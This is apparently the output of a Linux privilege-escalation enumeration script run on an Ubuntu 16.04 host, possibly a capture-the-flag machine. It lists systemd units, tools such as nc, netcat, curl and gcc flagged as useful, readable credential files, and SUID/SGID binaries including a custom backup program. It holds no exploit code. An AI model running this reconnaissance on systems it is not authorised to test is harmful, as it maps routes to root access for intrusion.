-rw-r--r-- 1 root root  334 Apr 16  2016 dm-event.service
-rw-r--r-- 1 root root  248 Apr 16  2016 dm-event.socket
-rw-r--r-- 1 root root  380 Apr 16  2016 lvm2-lvmetad.service
-rw-r--r-- 1 root root  215 Apr 16  2016 lvm2-lvmetad.socket
-rw-r--r-- 1 root root  335 Apr 16  2016 lvm2-lvmpolld.service
-rw-r--r-- 1 root root  213 Apr 16  2016 lvm2-lvmpolld.socket
-rw-r--r-- 1 root root  658 Apr 16  2016 lvm2-monitor.service
-rw-r--r-- 1 root root  382 Apr 16  2016 lvm2-pvscan@.service
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel5.target.wants
-rw-r--r-- 1 root root  234 Apr  8  2016 acpid.service
-rw-r--r-- 1 root root  251 Apr  5  2016 cron.service
-rw-r--r-- 1 root root  290 Apr  5  2016 rsyslog.service
-rw-r--r-- 1 root root  142 Mar 31  2016 apport-forward@.service
-rw-r--r-- 1 root root  225 Mar 31  2016 apport-forward.socket
-rw-r--r-- 1 root root  455 Mar 29  2016 iscsid.service
-rw-r--r-- 1 root root 1.1K Mar 29  2016 open-iscsi.service
-rw-r--r-- 1 root root  115 Feb  9  2016 acpid.socket
-rw-r--r-- 1 root root  115 Feb  9  2016 acpid.path
-rw-r--r-- 1 root root  169 Jan 14  2016 atd.service
-rw-r--r-- 1 root root  182 Jan 14  2016 polkitd.service
-rw-r--r-- 1 root root  790 Jun  1  2015 friendly-recovery.service
-rw-r--r-- 1 root root  241 Mar  3  2015 ufw.service
-rw-r--r-- 1 root root  250 Feb 24  2015 ureadahead-stop.service
-rw-r--r-- 1 root root  242 Feb 24  2015 ureadahead-stop.timer
-rw-r--r-- 1 root root  401 Feb 24  2015 ureadahead.service
-rw-r--r-- 1 root root  188 Feb 24  2014 rsync.service

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 May 10  2016 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10  2016 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 May 10  2016 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10  2016 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Aug 29  2017 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Aug 29  2017 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Aug 29  2017 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Aug 29  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Aug 29  2017 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jan 12  2017 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 24 May 10  2016 plymouth-quit.service -> ../plymouth-quit.service
lrwxrwxrwx 1 root root 29 May 10  2016 plymouth-quit-wait.service -> ../plymouth-quit-wait.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Aug 29  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 28 May 10  2016 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Aug 29  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 26 May 10  2016 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Aug 29  2017 console-setup.service -> ../console-setup.service
lrwxrwxrwx 1 root root 20 Aug 29  2017 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Aug 29  2017 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Aug 29  2017 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 25 Aug 29  2017 keyboard-setup.service -> ../keyboard-setup.service
lrwxrwxrwx 1 root root 28 Aug 29  2017 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Aug 29  2017 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 19 Aug 29  2017 setvtrgb.service -> ../setvtrgb.service
lrwxrwxrwx 1 root root 32 Aug 29  2017 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Aug 29  2017 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Aug 29  2017 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Aug 29  2017 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Aug 29  2017 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Aug 29  2017 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 27 Aug 29  2017 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 32 Aug 29  2017 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 36 Aug 29  2017 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Aug 29  2017 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Aug 29  2017 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Aug 29  2017 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Aug 29  2017 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Aug 29  2017 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 24 Aug 29  2017 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 31 Aug 29  2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 30 Aug 29  2017 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 May 10  2016 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 May 10  2016 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Aug 29  2017 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Aug 29  2017 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Aug 29  2017 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Aug 29  2017 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Aug 29  2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Aug 29  2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Jan 12  2017 dbus.socket -> ../dbus.socket

/lib/systemd/system/sigpwr.target.wants:
total 0
lrwxrwxrwx 1 root root 36 Aug 29  2017 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service

/lib/systemd/system/systemd-resolved.service.d:
total 4.0K
-rw-r--r-- 1 root root 200 Jul 17  2017 resolvconf.conf

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Jul  5  2017 disable-with-time-daemon.conf

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Aug 29  2017 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Aug 29  2017 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Jul  5  2017 debian.conf

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Aug 29  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/resolvconf.service.wants:
total 0
lrwxrwxrwx 1 root root 42 Aug 29  2017 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Aug 29  2017 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Aug 29  2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/busnames.target.wants:
total 0

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Mar 17  2016 hdparm

/lib/systemd/system-generators:
total 680K
-rwxr-xr-x 1 root root  71K Jul 19  2017 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root  59K Jul 19  2017 systemd-dbus1-generator
-rwxr-xr-x 1 root root  43K Jul 19  2017 systemd-debug-generator
-rwxr-xr-x 1 root root  79K Jul 19  2017 systemd-fstab-generator
-rwxr-xr-x 1 root root  39K Jul 19  2017 systemd-getty-generator
-rwxr-xr-x 1 root root 119K Jul 19  2017 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root  39K Jul 19  2017 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root  39K Jul 19  2017 systemd-insserv-generator
-rwxr-xr-x 1 root root  35K Jul 19  2017 systemd-rc-local-generator
-rwxr-xr-x 1 root root  31K Jul 19  2017 systemd-system-update-generator
-rwxr-xr-x 1 root root 103K Jul 19  2017 systemd-sysv-generator
-rwxr-xr-x 1 root root  11K Apr 16  2016 lvm2-activation-generator

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 869 Jul 19  2017 90-systemd.preset

/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 404 Jul 19  2017 80-container-host0.network
-rw-r--r-- 1 root root 482 Jul 19  2017 80-container-ve.network
-rw-r--r-- 1 root root  80 Jul 19  2017 99-default.link

/lib/systemd/system-shutdown:
total 0


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.16


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl


[-] Installed compilers:
ii  g++                                4:5.3.1-1ubuntu1                           amd64        GNU C++ compiler
ii  g++-5                              5.4.0-6ubuntu1~16.04.4                     amd64        GNU C++ compiler
ii  gcc                                4:5.3.1-1ubuntu1                           amd64        GNU C compiler
ii  gcc-5                              5.4.0-6ubuntu1~16.04.4                     amd64        GNU C compiler
ii  gcc-5-multilib                     5.4.0-6ubuntu1~16.04.4                     amd64        GNU C compiler (multilib support)
ii  gcc-multilib                       4:5.3.1-1ubuntu1                           amd64        GNU C compiler (multilib files)


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1650 Aug 31  2017 /etc/passwd
-rw-r--r-- 1 root root 818 Jan 18  2018 /etc/group
-rw-r--r-- 1 root root 591 Sep  3  2017 /etc/profile
-rw-r----- 1 root shadow 1190 Sep  3  2017 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 81672 Jul 17  2017 /usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 428240 Mar 16  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root admin 16484 Sep  3  2017 /usr/local/bin/backup
-rwsr-xr-x 1 root root 49584 May 17  2017 /usr/bin/chfn
-rwsr-sr-x 1 daemon daemon 51464 Jan 14  2016 /usr/bin/at
-rwsr-xr-x 1 root root 75304 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 May 17  2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 40432 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 23376 Jan 17  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 39904 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 32944 May 17  2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Jun 14  2017 /bin/umount
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 40128 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 40152 Jun 14  2017 /bin/mount


[-] SGID files:
-rwxr-sr-x 1 root shadow 35600 Mar 16  2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Mar 16  2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root utmp 10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 62336 May 17  2017 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 51464 Jan 14  2016 /usr/bin/at
-rwxr-sr-x 1 root shadow 22768 May 17  2017 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 358624 Mar 16  2017 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 39520 Nov 18  2014 /usr/bin/mlocate
-rwxr-sr-x 1 root utmp 434216 Feb  7  2016 /usr/bin/screen
-rwxr-sr-x 1 root tty 27368 Jun 14  2017 /usr/bin/wall
-rwxr-sr-x 1 root tty 14752 Mar  1  2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 36080 Apr  5  2016 /usr/bin/crontab


[+] Files with POSIX capabilities set:
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 1260 Mar 16  2016 /etc/ucf.conf
-rw-r--r-- 1 root root 3028 Aug  1  2017 /etc/adduser.conf
-rw-r--r-- 1 root root 6816 May 11  2017 /etc/overlayroot.conf
-rw-r--r-- 1 root root 191 Jan 18  2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 34 Jan 27  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 14867 Apr 12  2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 2584 Feb 18  2016 /etc/gai.conf
-rw-r--r-- 1 root root 771 Mar  6  2015 /etc/insserv.conf
-rw-r--r-- 1 root root 100 Jan 10  2017 /etc/sos.conf
-rw-r--r-- 1 root root 2969 Nov 10  2015 /etc/debconf.conf
-rw-r--r-- 1 root root 338 Nov 18  2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 703 May  6  2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 350 Aug 29  2017 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 967 Oct 30  2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 497 May  4  2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2084 Sep  6  2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 4781 Mar 17  2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 1371 Jan 27  2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 552 Mar 16  2016 /etc/pam.conf
-rw-r--r-- 1 root root 568 Jul 27  2017 /etc/mongod.conf
-rw-r--r-- 1 root root 144 Aug 29  2017 /etc/kernel-img.conf
-rw-r--r-- 1 root root 604 Jul  2  2015 /etc/deluser.conf
-rw-r--r-- 1 root root 7788 Aug 29  2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 92 Oct 22  2015 /etc/host.conf


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 Aug  1  2017 .
drwxr-xr-x 15 root root 4096 Sep  3  2017 ..


### SCAN COMPLETE ####################################
